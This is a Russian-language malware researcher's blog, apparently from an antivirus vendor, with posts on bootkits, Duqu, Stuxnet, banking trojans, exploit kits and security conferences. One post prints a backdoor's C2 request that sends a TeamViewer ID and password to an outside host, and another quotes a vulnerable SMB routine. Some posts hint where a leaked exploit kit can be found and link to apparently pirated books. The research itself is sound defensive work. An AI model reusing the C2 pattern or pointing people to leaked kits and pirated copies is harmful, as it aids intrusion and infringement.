Arts of Bootkit

Несколько недель назад на конференции MalCon'2011 была представлена любопытная работа "Windows 8 Bootkit and Art of Bootkit Development" (Peter Kleissner). В ней описывается практически все известные наработки в области создания современных буткитов и что наиболее интересно автор нашел возможность создания рабочего концепта для Win8, несмотря на все утверждения MS о новых технологиях защиты SecureBoot (UEFI-based). 

Видео с демонстрацией работы концепта:

The Art of Bootkit Development [pdf]

Видимо следующем шагом в эволюции высокотехнологичных вредоносных программ станет переход к использованию технологий аппаратной визуализации в массовом порядке, а не только в редких концептах.

Обзор книги «A Bug Hunter’s Diary»

Не так давно появилась в продаже англоязычная версия  достаточно любопытной книги «A Bug Hunter’s Diary», изданной издательством No Starch Press. 

"Give a man an exploit and you make him a hacker for a day; teach a man to exploit bugs and you make him a hacker for a lifetime." - Felix 'FX' Lindner, Head of Recurity Labs / Phenoelit

В последнее время получается так, что книги именно этого издательства чаще всего попадают на мою книжную полку (The Tangled Web, Metasploit, IDA Pro Book). Собственно, чем же меня заинтересовала эта книга, ответ достаточно прост: я давно уже искал книгу для студентов.  Требования к книге  были довольно просты, она должна была бы разъяснять методы эксплуатации уязвимостей не на каких-то надуманных искусственных  примерах и при этом позволяла бы людям не искушенным в этом вопросе ознакомиться с предметной областью. A Bug Hunter’s Diary оказалась именно той книгой, что я искал в качестве дополнительной литературы и которую я мог бы рекомендовать моим студентам. Автор книги Tobias Klein, выстроил ее таким образом, что она постепенно переходит к более сложным темам и  при этом рассматриваются уязвимости в реальных программных продуктах, которые известны многим и пользуются популярностью. Но сразу стоит сказать, что книга рассчитана на людей не искушённых с темой поиска уязвимостей и их эксплуатации, здесь вы не найдете новых методик обхода DEP/ASLR или руководство по использованию ROP.

Возвращение SpyEye

На прошлой неделе попался на глаза интересный сэмпл SpyEye. Собственно интересен он тем, что имеет целевые плагины для российских ДБО систем.

Carberp + BlackHole = рост ДБО инцидентов

В моем предыдущем сообщении я уже делал акцент на серьезном увлечении распространения троянской программы Carberp с легальных веб-сайтов, причем с довольно серьезной посещаемостью. В качестве эксплойтпака там всегда встречался BlackHole одной из последних версий. Например, в ноябре было замечено заражение таких ресурсов, как:

• glavbukh.ru - скрытая переадресация на  jya56yhsvcsss.com/BVRQ (BlackHole)
• ria.ru - скрытая переадресация на   aysh5tg2h3nk.com/BVRQ (BlackHole)

У этих сайтов большой объем целевой аудитории людей, которые имеют доступ к управлению финансами в различных организациях и немаленький процент из этих людей подверглись атаки и последующему заражению троянцем Carberp, который прославился своей ДБО ориентированностью.

Подводя итоги ноября мы были просто шокированы количеством предотвращенных заражений этой вредоносной программой. Помимо того, что она вошла в пятерку самых распространенных угроз по нашему региону обратите внимание на рост обнаружении в  ноябре месяце:

Java эксплойты впереди всех по пробиву

За последнее время Java-эксплойты получили наиболее широкое распространение в составе различных эксплойт-паков. Уровень пробива у них очень высок, так как обновляют JRE многие крайне редко, да и вообще забывают о его существовании. Для злоумышленников дополнительном стимолом к поиску уязвимостей в JRE является легкость их эксплуатации, стабильность, работа в обход различных песочниц внутри браузеров и кроссплатформенность.

ZeroNights: глазами докладчика

Наконец-то нашлось время для того, чтобы как то упорядочить свои впечатления от прошедшей на днях конференции ZeroNights. Организаторам совершенно однозначно удалось достичь высокого уровня докладов и актуальности рассмотренных тем. Так как в этом году мне довелось посетить большое количество зарубежных конференций со всей ответственностью, могу заявить, что ZeroNights был на уровне. Но с точки зрения организации были конечно моменты, которые я озвучу лично оргам и которые хотелось бы избежать в будущих мероприятиях. Мне большего всего не хватало атмосферы "хакерской конференции", как это было на Ekoparty или Confidence.

Мое участие началось с доклада "Современные тенденции развития вредоносных программ для систем ДБО", в котором было рассказано о последних тенденциях и эволюции в разработке банковских троянов, заточенных под Россию. Если охарактеризовать текущую ситуацию одним слайдом, то это будет выглядеть примерно так:

ESET на ZeroNights

Осталось всего несколько дней до основного мероприятия этой осени для исследователей в области ИБ. Мы, как компания с большим штатом ресечеров просто не могли пройти мимо и решили поддержать ZeroNights став основным спонсором мероприятия. Для нашей компании это уже сложившаяся практика поддержки практических конференций. На нашем счету уже такие мероприятия, как PHD, Confidence, Ekoparty, REcon.

В рамках программы мероприятия от нас будет два доклада:

• Современные тенденции развития вредоносных программ для систем ДБО
• Win32/Duqu: инволюция червя Stuxnet (FastTrack)

А еще всех участников конференции ждет новый увлекательный квест по реверсингу, с главным призом Amazon Kindle DX. Подходите к нашему стенду, регистрируйтесь и участвуйте! Правила конкурса простые, кто первый сломал того и Kindle =)

Новая модификация Carberp использует буткит-функционал

Недавно  нам удалось обнаружить модификацию троянца Win32/Carberp, который в процессе заражения системы устанавливает буткит-функционал. Причем, после более детального анализа выяснилось, что буткит функциональность практически полностью копирует ранее известного буткита Rovnix.

Carberp, один из самых активных троянцев встречающихся в ДБО инцидентах в этом году. Мы провели небольшое расследование по этой теме помимо буткита, нашли еще много интересного.

Подробное исследование можно найти тут:

Evolution of Win32Carberp: going deeper [EN]

Банковский троянец Carberp приобрел буткит-функционал [RU]

А, так же более расширенную версию нашего расследования можно будет услышать на  конференции ZeroNights в ближайшую пятницу в рамках нашего доклада "Современные тенденции развития вредоносных программ для систем ДБО".

HA­CKER­PRAK­TI­KUM в Бохуме

На прошлой неделе удалось побывать на интересном мероприятии HA­CKER­PRAK­TI­KUM, которое проводится уже на протяжении нескольких лет в университете RUHR города Бохум. Нас, вместе с Евгением Родионовым, пригласили выступить с докладом, который мы уже демонстрировали на Ekoparty в этом году. Мероприятие HA­CKER­PRAK­TI­KUM, в рамках которого нам предложили выступить, проводится уже не первый год и призвано дать студентам практические знания от специалистов из различных областей в ИБ.

Win32/Duqu REsearch: что скрывает RPC

Мы продолжаем исследование Win32/Duqu, в этом посте поговорим об особенностях использования RPC-протокола. Во-первых, сразу хочу отметить,  что реализация RPC-протокола еще раз подтверждает сходство кода Duqu и Stuxnet. RPC-протокол, был одной из наиболее интересных частей Stuxnet. В Duqu используется, лишь часть от полного функционала этого протокола, который подробно описан в нашем исследовании "Stuxnet under the Microscope" (стр. 56-57).

Проанализировав реализацию RPC-сервера в одном из компонентов Duqu, который реализует лишь локальную часть протокола и сравнив в BinDiff две основные процедуры, мы получили интересные результаты:

Как определить точную дату заражения Win32/Duqu

После того, как появилась первая информация о Win32/Duqu мы не могли пройти мимо, так как нам было очень интересно составить собственные впечатления об этой угрозе (да и challenge со Stuxnet напомнило). Начали копать, оказалось, что код Duqu имеет очень много общего со своим старшим братом Stuxnet. В процессе анализа складывается впечатление, что некоторые части просто полностью повторяют код из Win32/Stuxnet. Код драйверов практически идентичен, еще из наблюдений скорее всего для обоих разработок был использован какой то общий фреймворк для разработки всякого.

С того момента, как мы начали исследовать Win32/Duqu, нас интересовал вопрос, каким образом можно идентифицировать точную дату заражения компьютера этой вредоносной программой (т.к. дроппер нам до сих пор найти не удалось). Такая информация, прежде всего, полезна для проведения криминалистической экспертизы и восстановления картины произошедших событий. У нас появилась идея о том, что если Duqu хранит информацию о моменте своего самоудаления, то должна быть информация, с которой начинается этот отсчет (варианта могло быть два, либо счетчик, либо дата заражения). Нам удалось обнаружить интересную вещь, на данный момент у нас есть несколько наборов сэмплов с различных зараженных машин. И оказалось, что в процессе заражения формируется так называемая main.dll, в которой сохраняется точная дата заражения в UTC-формате. Ниже мы приводим декомпилированный код, осуществляющий проверку этой самой даты:

Win32/Olmasco: новый виток развития TDL4

На днях в нашем англоязычном блоге мы уже писали об изменениях, произошедших за последнее время с TDL4. Для того, чтобы не было кривотолков нашего исследования, а оно уже стало сумбурно цитироваться русскоязычными СМИ, немного проясню ситуацию. Итак, во второй половине сентября нам попался интересный сэмпл TDL4 (точнее сначала мы так думали), который не смог быть обработан нашим автоматическим трекером для этого буткита. Собственно именно этот факт и привлек наше пристальное внимание к нему, при более детальном анализе оказалось, что это не Win32/Olmarik, а его модификация Win32/Olmasco (также известная, как MaxxSS). Olmasco базируется на исходных кодах TDL3/TDL4 и разрабатывается/поддерживается совсем другой группой разработчиков (это отчетливо видно по модификациям внесенным в код). Первый сэмпл попавший в семейство Win32/Olmasco в наших базах был обнаружен аж в январе этого года (обновление антивирусных баз от 2011/01/11), до этого момента мы не выделяли эти модификации в отдельное семейство. Вначале Olmasco базировался на исходных кодах TDL3, но в сентябре ситуация изменилась и появилась модификация базирующаяся на исходных кодах TDL4. Первыми, кто заметил нестандартный TDL4, была компания Microsoft. Исследователи из MS опубликовали интересную особенность нового Win32/Olmasco у себя в блоге. А точнее, новый буткит получил помимо новых возможностей дистрибуции по различным партнеркам, любопытный функционал получения резервных адресов командных центров. Эти адреса скачивались в виде изображений, которые использовались в роли стегано-контейнеров.

Win32/Duqu: новый виток развития истории со Stuxnet

Буквально несколько часов назад компания Symantec обнародовала довольно интересный исследовательский отчет "Duqu: the precursor to the next Stuxnet". Собственно повествует он о вредоносной программе, которая своей реализацией сильно напоминает все известный Stuxnet. Причем настолько напоминает, что местами, кажется, что этот код писала одна и таже группа разработчиков. Сценарий работы очень схож со Stuxnet, но кода много и поэтому на 100% процентов для себя еще не подтвердил идентичность авторов. Из интересного вот такая вот сравнительная таблица:

Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy

Слайды нашего доклада с VB'2011:

Это немного урезанный вариант доклада с Ekoparty, плюс добавилось несколько новых слайдов в конце, о причинах работы этого вектора атак.

Впечатления от Ekoparty

В этом году конференция Ekoparty прошла уже в седьмой раз, если кто не знает эта самое главное мероприятие для  латинской Америки и традиционно оно проходит в славном городе Буэнос-Айрес. Мероприятие в первую очередь направленно на исследователей в области ИБ и содержит  большое количество хардкорных технических докладов.

Defeating x64: Modern Trends of Kernel-Mode Rootkits

Слайды нашей презентации на Ekoparty:

Это было незабываемо, одна из самых ярких конференций на которых мне доводилось побывать. Чуть позже подготовлю более детальный отчет с эксклюзивными фотками =)

Ekoparty и VB2011

Достаточно длительное время мы трудились над исследованием современных буткитов для x64 и прочих техник обхода проверок цифровой подписи для модулей ядра на 64-битных системах. В итоге результаты нашего исследования будут представлены сначала на Ekoparty в Буэнос-Айресе в более хардкорном техническом варианте "Defeating x64: Modern Trends of Kernel-Mode Rootkits". А после этого на VB2011 в Барселоне уже в более концептуальном виде "Modern bootkit trends: bypassing kernel-mode signing policy", адаптированном для АВ-публики :)

В задачи подготовки этих выступлений входило не просто подготовить рассказ о современных техниках загрузки не подписанных модулей ядра на 64-битных системах, а рассказать о концептуальных причинах, которые делают это возможным и почему MS не может выпустить волшебный патч. После конференций слайды обязательно положу здесь ;)

Win32/Wapomi модифицирует прошивку BIOS

Началось все в начале сентября с опубликованного, китайской антивирусной компанией 360 Security, сообщения в блог о найденной вредоносной программе, которая осуществляет модификацию прошивки  BIOS. Это сообщение не особо было замечено общественностью, быть может, ввиду того, что было опубликовано на китайском или из-за небольшого количества читателей самого блога. Но на прошлой неделе появилось уже сразу две публикации на английском:

• Mebromi, a bios-flashing trojan (Norman)
• BIOS threat is showing up again! (Symantec)

Первая мало информативна, т.к. автор в основном рассуждает о былых временах и концептах ушедших лет, разбавляя это не очень интересными картинками. А вот второй пост от Symantec более содержателен и описывает некоторые подробности работы.

CC'11 впечатления

В выходные мне таки давилось побывать на Chaos Constructions'2011 и сразу хочу сказать, что мои опасения сбылись. В этом году фестиваль значительно уступал прошлогоднему мероприятию в плане ИБ составляющей, да и в принципе народу было меньше. Конечно, по анонсированной программе семинаров это все было итак понятно, я туда ехал скорее пообщаться с друзьями, нежели на сам фестиваль. Что касается HackQuest в этом году, то со слов организаторов, задания были упрощены, так как по опыту прошлых лет немногие с ними могли справится. Но вот удалось ли им достичь баланса между упрощением заданий и интересными квестами, сам судить я не могу, ибо не участвовал (крякми то не было никакого). Но слов некоторых участников, по сравнению с прошлом годом получилось хуже. Из позитивного в этом году был интересный конкурс от ONsec и Владимира Воронцова по обходу WAF.

Chaos Constructions'2011

Уже традиционно в последние выходные лета в Питере проходит компьютерный фестиваль Chaos Constructions. И так же уже традиционно на этом фестивале большая часть докладов и конкурсов посвящены тематике информационной безопасности. Для себя отметил несколько докладов, которые хочу посетить:

"Lockpicking - зачем это нужно ИТ специалистам?" - Алексей Синцов

"Безопасность расширений веб-браузеров на примере Mozilla Firefox"- Тарас Иващенко

"Безопасность браузеров. Атаки на пользовательский интерфейс" - Владимир Воронцов

Так, что на этих докладах меня можно будет поймать в зале и пообщаться ;)

Техники обхода проверок цифровой подписи на x64

Множится нынче количество угроз для 64-битных платформ с виндой, причем множатся не только различные троянцы, но и рукиты/буткиты в том числе. Причины очевидны, доля WinXP уверенно снижается, а предустановленных версий Win7(x64) становится все больше. В подтверждение этому факту вот такая интересная статистика за последний год:

Сейчас из наиболее интересных и активных угроз для x64 можно выделить следующие семейства: 

• Win64/Olmarik (MBR bootkit) 
• Win64/Rovnix (VBR bootkit) 
• Win64/TrojanDownloader.Necurs 
• Win64/Spy.Banker 

Используемые ими подходы можно разделить на две большие группы и представить графически в виде следующей схемы:

Насколько защищены современные браузеры?

Недавно мне попалась на глаза интересный доклад от Dino Dai Zovi "Attacker “Math” 101", в которой нашлись очень здравые схемы демонстрирующие ответ на этот вопрос. По нашей статистике, что я уже не однократно отмечал, беспрецедентное лидерство про проникновению имеют java эксплойты. А ответ почему, как раз наглядно проиллюстрирован на следующей схеме:

Собственно, что из этого следует, основная мысль в том, что реализация java платформы по прежнему не использует механизмы противодействия эксплуатации и является слабым звеном, не смотря на все новомодные "песочницы" и прочий стаф. Если из этой цепочки исключить java, то все становится значительно сложнее для злоумышленников:

А вот, что бывает после обхода "песочницы":

Проверить насколько актуальна ваша версия Java-плагина можно, к примеру, при помощи сервиса SurfPatrol от PT.

Противодействие криминалистической экспертизе со стороны вредоносных программ

Вчера мы выпустили исследовательский отчет об одном интересном троянце Win32/Hodprot. Интересен он тем, что использует довольно хитрые механизмы противодействия своему обнаружению в системе. Итак, давайте обо всем по порядку ;)

Процесс заражения системы можно описать следующей схемой:

Practical C++ decompilation

слайды презентации

Kad.dll или P2P протокол для ботнета TDL4

Kad.dll (MD5: d532084641791ff3db1fbf885120e6e6 VT) это название нового пейлоада для зараженных машин руткитом TDL4, который был предназначен для инжекта в пользовательские процессы (что то вроде cmd32.dll/cmd64), в текущей версии поддерживаются только x86 системы. Появился этот компонент еще в начале года и до сих пор распространяется с кучей отладочных проверок, что наводит на мысли о его маленькой распространенности (подтверждено нашей статистикой) и видимо пока тестировании на небольших группах уже зараженных пользователей.

Библиотека kad.dll базируется на протоколе Kademilia для построения P2P. В основе этого протокола лежит распределенная таблица хешей, посредством которой создается новая абстрактная сеть в рамках которой взаимодействуют зараженные узлы. В отличие от архитектуры клиент-сервер (админка-бот), в рамках P2P сети каждый узел может выступать и в роли бота, и роли админки одновременно.

Наиболее распространенные эсплойт паки

Попалась сегодня на глаза интересная инфографика на тему распространенных нынче связок эксплойтов:

На оригинальной картинке еще приведены ныне уже почившие, но когда то очень даже популярные наборы эксплойтов. Как показывает наша статистика во всех этих связках используются далеко не 0-day уязвимости, а вполне приличный пробив обеспечивают баяны из группы Flash/PDF/Java.

Криминалистический анализ TDL4 и TdlFsReader

С сегодняшнего дня обновленный TdlFsReader (hxxp://eset.ru/tools/TdlFsReader.exe) пошел на паблик. Поддерживаются все известные модификации, как для x86, так и для x64.

Ну и чтобы закрыть вопрос с демками которые показывались на PHD и CONFidence, записано видео с отладкой кода буткита в TDL4, который, собственно, осуществляет обход проверки цифровой подписи в драйверах для x64 систем. 

CONFidence'2011 (Krakow)

В последнее время мне довелось побывать на большом количестве конференций в качестве докладчика, но больше всего меня поразила CONFidence'2011 в Кракове. Организаторы этой конференции очень трепетно относятся ко всем докладчикам и готовы компенсировать им все расходы за перелет, гостиницу и такси в аэропорт. Помимо этого каждый день нас водили в какой-нибудь местный ресторан для ужина, чтобы докладчики могли познакомиться и пообщаться между собой. Ко всему прочему на самой конференции для докладчиков было бесплатное пиво и прочие радости :) Вообщем по мнению большинства опрошенных мной спикеров, все они сходятся во мнении, что на CONFidence организаторы больше всего любят докладчиков и таких условий больше нет нигде. Конечно же очевидна причина такого отношения, это необходимость привлечь как можно больше интересных докладов из разных стран.

Впечатления от PHD

Сегодня практически с самого начала я присутствовал на этом мероприятии. У входа мне удалось встретить знакомых из оргов и меня любезно провели миную огромную очередь страждущих попасть внутрь, чтобы я мог не торопясь подготовить оборудование для проведения мастер-класса "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4".

На самом деле наверное жестоко было мучить публику с утра по раньше хардкорными выкладками об внутреннем устройстве ОС и механизмах обхода проверок цифровой подписи :) Но выбора у меня не было, так как в полдень я уже должен был выдвигаться в аэропорт, но об этом расскажу позже. На удивление этот хардкор заинтересовал довольно многих и зал был наполнен целиков, включая проходы. Это крайне приятно, значит не зря было потрачено время на подготовку.

Завтра PHD

Завтра пройдет долгожданное многими мероприятие "Positive Hack Days", программа конференции выглядит довольно многообещающе.

Завтра всех призываю участвовать в нашем конкурсе по реверсингу, начало регистрации на него собственно стартует в 9:30, т.к. задание довольно интересное и требующее времени на решение. Кто первым добудет все кодовые фразы тот и получит главный приз. А всех участников конкурса ждут сувениры от ESET ;) 

Так же завтра с утра пройдет мой мастер-класс по теме "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4". Изначально он задумывался как двух часовой, но потом был урезан в связи ограничением по времени в один час по регламенту конференции. Поэтому сделать много интерактива не получится, но все равно будет интересно:

• Эволюция современных руткит-программ
• Этапы установки на x86/x64
• Буткит и обход проверки подписи
• Отладка буткита на эмуляторе Bochs
• Хуки в режиме ядра
• Отладка с использованием WinDbg
• Файловая система TDL4
• TdlFsReader, как инструмент криминалистической экспертизы

CARO'2011 in Prague

В начале мая мне довелось побывать на довольно интересном мероприятии CARO 2011 Workshop. В прошлом году я уже посещал эту конференцию у финов, но на этот раз мы представляли собственный доклад "Cybercrime in Russia: Trends and Issues". Который мы готовили совместно с криминалистами из Group-IB.

Новая модификация TDL4 обходит костыль MS Advisory (2506014)

Что собственно и следовало ожидать, в конце прошлой недели была обнаружена новая модификация TLD4 (Win32/Olmarik.AMN), которая обходит вставленный костыль от MS для противодействия используемому методу загрузки не подписанных дров (VT). Первая информация поэтому поводу появилась здесь, после чего достаточно оперативно Prevx написали неплохой блогпост по теме.

По сути произошло два важных изменения, это механизм обхода костыля от MS и изменилась функциональность связанная с хуками (неплохой блогпост от mcafee по теме), по всей видимости она была изменена для обхода существующих алгоритмов лечения.

Update: наш официальный блогпост по теме "The co-evolution of TDL4 to bypass the Windows OS Loader patch (KB2506014 )"

MS Advisory (2506014) закрывает брешь для установки на x64 винде

Наконец дождались и MS стала прикрывать, мягко говоря очень не новые дыры, связанные с некоторыми методами обхода загрузки не подписанных дров для x64 винды. В частности в вышедшем вчера патче MS Advisory (2506014) были внесены изменения в загрузчик winload.exe, которые препятствуют загрузки не подписанных драйверов TDL4. В процессе инсталляции руткита все происходит, как обычно, но вот после перезапуска системы его драйвера просто не будут загружены.

Но стоит отметить, что этот путь к спасению, работает только для пользователей, которые будут подвержены заражению после этого патча. Тем, кого угораздило заразится ранее уже ничего не поможет :) Точнее TDL4 умеет блокировать доступ к серверам с обновлениями winupdate, поэтому получить заветный патч им будет нелегко.

Ну и для общности картины надо отметить, что семейство китайских буткитов, дроппер которого мы детектим, как NSIS/TrojanClicker.Agent.BJ (VT), использует иные методы обхода проверки подписи, которые этим патчем не были закрыты.

Update: Вышел наш блог пост "KB2506014 kills TDL4 on x64" в официальном блоге, с более подробным объяснением случившегося.

The Evolution of TDL: Conquering x64

Вчера мы выпустили полный отчет по теме TDL4: "The Evolution of TDL: Conquering x64" [pdf]. Он характерно отличается от того, что есть на данный момент систематичностью излагаемого материала и его детализацией.

Подробно рассмотрены не только аспекты внедрения и работы самого руткита, но и пути его распространения и кто за этим стоит.

По данной теме планируется в ближайшее время два выступления, причем на CONFidence придется поехать сразу после доклада на PHD :)

Мастер-класс "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4" на Positive Hack Days

Доклад "Defeating x64: The Evolution of the TDL Rootkit" на CONFidence'2011 Krakow

Positive Hack Days - must see!

Готовится крайне интересное мероприятие и возможно у нас появится наконец хоть одна конфа с большим числом интересных докладов из которых можно извлечь для себя реальную пользу.

Ralph Langner o PLC Payload из Stuxnet

Ralph Langner довольно неплохо разложил все по полочкам о PLC Payload из Stuxnet:

Безопасность SCADA все больше волнует исследователей

В последнее время все больше внимания привлекается к безопасности в области промышленных SCADA систем. Отчасти катализатором такого пристального внимания стал громкий инцидент с червем Stuxnet и беспрецедентными суммами нанесенного им ущерба.

На недавно прошедшей в Мадриде конференции RootedCon'11 был представлен весьма интересный доклад "SCADA Trojans: Attacking the grid" по этой теме:

- 0-day уязвимости в Advantech/BroadWin WebAccess SCADA

- архитектурные уязвимости в CSE-Semaphore TBOX RTUs

- рассмотрены различные вектора возможных атак

[слайды] SCADA Trojans: Attacking the grid
PoC код эксплойтов

Phoenix exploit kit 2.5 leaked

Собственно сабж утек на днях на паблик и стал достпен широкой общественности, ох не к добру ...

Сейчас это наверное самый распространенный и наиболее часто утекающий сплойт-пак, но видимо это следствие вытекает из первого утверждения.

Ссылку на opensc.ws уже прибили, но при умении пользоваться гуглом и небольшой смекалке все находится достаточно быстро. Как я уже писал ранее в последнее время Java стала одним из основных векторов client-side атак и здесь только подтверждается пристальное внимание и особая любовь к Java-сплойтам со стороны разработчиков.

Использование связки эксплойтов

Попалось мне тут под руку достаточно наглядное видео, демонстрирующее атаку с использованием связки эсплойтов (причем достаточно свежих) для успешного пробива конечной цели. В качестве атакующего софта используется Immunity CANVAS последней версии. Еще обратите внимание на демонстрацию обхода IE sandbox, где то в середине ролика.

Владельцы ботнета TDL4 стали продавать инсталы на инфицированных машинах?

Недавно было замечено, что некоторые свежие сэмплы TDL4 тащат за собой всякое (Win32/Glupteba.E, Win32/Glupteba.D). Причем ставится эта малвара без использования возможностей самого руткита по сокрытию сторонних процессов в системе. TDL4 выполняет только команду DownloadAndExecute и на этом его участие заканчивается.

Троянцы Win32/Glupteba.D, Win32/Glupteba.E, нацелены на скликивания контекстной рекламы, особенно активно проявили себя относительно рекламной сети бегуна.

Пробив через Java по прежнему лидирует

По нашей статистике за последние несколько месяцев наблюдается высокий уровень концентрации среди детектов различных Java-эксплойтов. Причем не особо новых, но уровень пробива по ним очень высок (не по нашей статистике, а в принципе =)).

...
10) PDF/Exploit.Pidief.PDS.Gen 1,00%
...
18) Java/TrojanDownloader.Agent.NCA 0,73%
...
20) Java/Exploit.CVE-2010-0094.C 0,60%

Выше наша статистика по России и СНГ, дженерик на PDF немного обогнал остальных, но по миру в целом, Java лидирует. Это подтверждают и данные из админок от некоторых сплойтпаков:

MS Windows SMB "mrxsmb.sys" Remote Heap Overflow

Вчера появился CVE-2011-0654 на уязвимость в переполнении кучи в процессе обработке специально подготовленных пакетов по протоколу Windows BROWSER, который работает поверх SMB. PoC несколькими днями раньше и уже произвел резонанс в определенных кругах. Виной всему функция BowserWriteErrorLogEntry() из mrxsmb.sys в которой собственно и происходит страшное:

mrxsmb!BowserWriteErrorLogEntry+0x174: f64d815a f3a5 rep movs dword ptr es:[edi],dword ptr [esi] STACK_TEXT: f78c27b0 80825b5b 00000003 e168a000 00000000 nt!RtlpBreakWithStatusInstruction f78c27fc 80826a4f 00000003 c070b450 8659fdb0 nt!KiBugCheckDebugBreak+0x19 f78c2b94 80826de7 00000050 e168a000 00000000 nt!KeBugCheck2+0x5d1 f78c2bb4 8085a533 00000050 e168a000 00000000 nt!KeBugCheckEx+0x1b f78c2c28 808868d0 00000000 e168a000 00000000 nt!MmAccessFault+0xa91 f78c2c28 f64d815a 00000000 e168a000 00000000 nt!KiTrap0E+0xd8 f78c2ccc f64d8ddc 40001f5b 00000000 f78c2cfc mrxsmb!BowserWriteErrorLogEntry+0x174 f78c2d6c f649de02 85292008 8659fdb0 808a76c0 mrxsmb!HandleElectionWorker+0x2dc f78c2d80 8087ade9 00000000 00000000 8659fdb0 mrxsmb!BowserCriticalThreadWorker+0x32 f78c2dac 809418f4 00000000 00000000 00000000 nt!ExpWorkerThread+0xeb f78c2ddc 80887f7a 8087acfe 00000000 00000000 nt!PspSystemThreadStartup+0x2e 00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16

На самом деле все банально:

if ( Length > 0 )  
    RtlCopyMemory(StringOffset, InsertionString, Length*sizeof(WCHAR));  

Vupen подтвердила работу уязвимости для Win Server 2003 SP2 и WinXP SP3, а MS утверждает, что в принципе этой уязвимости подвержены все версии винды, но ничего страшного сделать с ними нельзя кроме DoS.

Сплойт в составе Metasploit

Зевс по прежнему актуален

Тут стало популярным мнение о том, что зевс (Win32/Spy.Zbot) практически загнулся. Но на самом деле он еще долго будет барахтаться в предсмертных конвульсиях и приносить не которым неплохие деньги. Более того, процент участия вредоносных программ из этого семейства в инцидентах связанных с ДБО, тоже достаточно высок. Так, что похороны были как минимум преждевременными.

Бот билдер с админкой старых версей не раз утекал в свободный доступ, а появление SpyEye конечно снизило число предложений о продаже зевса, но они по прежнему есть. Так вот тут буквально вчера MS показала интересную статистику:

Снова засветился на НТВ

Сегодня исполнился ровно год с того момента, как в России появился центр вирусных исследовании и аналитики у компании ESET. И поэтому поводу о нас решили снять сюжет на НТВ и пустить его в прайм-тайм :) (это шутка и конечно было все не так, но поздравления в комменты все равно принимаются по поводу ДР центра =))

Эволюция client-side эксплойтов в картинках

Как же просто все было в году эдак в 2004:

И как же все усложнилось сейчас:

Обе картинки потырены наглым образом из презентации:
Dino A. Dai Zovi
"Memory Corruption, Exploitation, and You" (слайды)

Концепт мобильного ботнета управляемого по SMS

На конференции Shmoocon'2011 был представлен интересный подход к построению мобильного ботнета с возможностью управления через SMS на телефонах на базе Android.

Слайды презентации

Видео с демонстрацией работы:

Уязвимость в обработке MHTML протокола (CVE-2011-0096)

Около двух недель назад появилась интересная информация "Hacking with mhtml protocol handler". Как оказалось очередной 0-дей в обработке MHTML, на этот раз уязвимость кроется в обработке MIME-formatted запросов. При определенных условиях злоумышленник может внедрить js-код, который выполниться на клиентской стороне. Последствия могут быть разные, например похищение аутентификационных данных для популярных сервисов или банальный XSS. Работает уязвимость только на IE, но зато для всех версий и видне начиная с ХР и выше.

Win32/Sheldor - теперь малиновый ...

Недавно уже писал про семейство Win32/Sheldor и вот на днях граждане порадовали другой версией Win32/Sheldor.E (VT) с двумя интересными командами:

Атака на антивирусные облака

На днях у себя в блоге MS опубликовала заметку о китайском троянце, который использует техники противодействия облачным антивирусным технологиям. С точки зрения приманки для журналистов все сработало, ибо заявление достаточно интересное, но на самом деле сей троянец достаточно прост и никаких инноваций в себе не несет.

Итак, способы противодействия облакам:
- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.

Эксплойт для MS10-073 таки попал на паблик

Сегодня на Metasploit появился эксплойт для повышения привилегий до SYSTEM, через эксплуатацию уязвимости в неправильной обработки keyboard layout (win32k.sys). MS10-073 известен тем, что применялся червем Stuxnet для повышения привилегий на системах Win2000/WinXP и уже много где достаточно подробно разобран (анализ от vupen).

В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с PoC, который разработал Ruben Santamarta aka reversemode и положил на паблик на прошлой неделе.

А вот уязвимость с переполнением стека при обработке SystemDefaultEUDCFont (CVE-2010-4398) по прежнему не закрыта, а ведь прошло у больше двух месяцев.

Чтиво для вирусного аналитика

Как то я уже писал о книге Malware Analyst's Cookbook Если кому надо, то вот:
http://depositfiles.com/files/3tgmhz81h
А здесь все исходные тексты из книги: http://code.google.com/p/malwarecookbook

Еще недавно приобрел неплохую книжицу "A Guide to Kernel Exploitation: Attacking the Core", но в интернетах водится ее электронная версия:
http://depositfiles.com/files/a5v5r0xkh

TeamViewer, как компонент бэкдора

Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1

User-Agent: x3

Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD (VT).

0-day для Graphics Rendering Engine

Интересный эксплойт появился на метасплойте в начале января для CVE-2010-3970. Началось все с двух товарищей Moti Joseph & Xu Hao, которые поведали миру о переполнении стека при отображении thumbnails файлов на конференции POC2010 в середине декабря (слайды).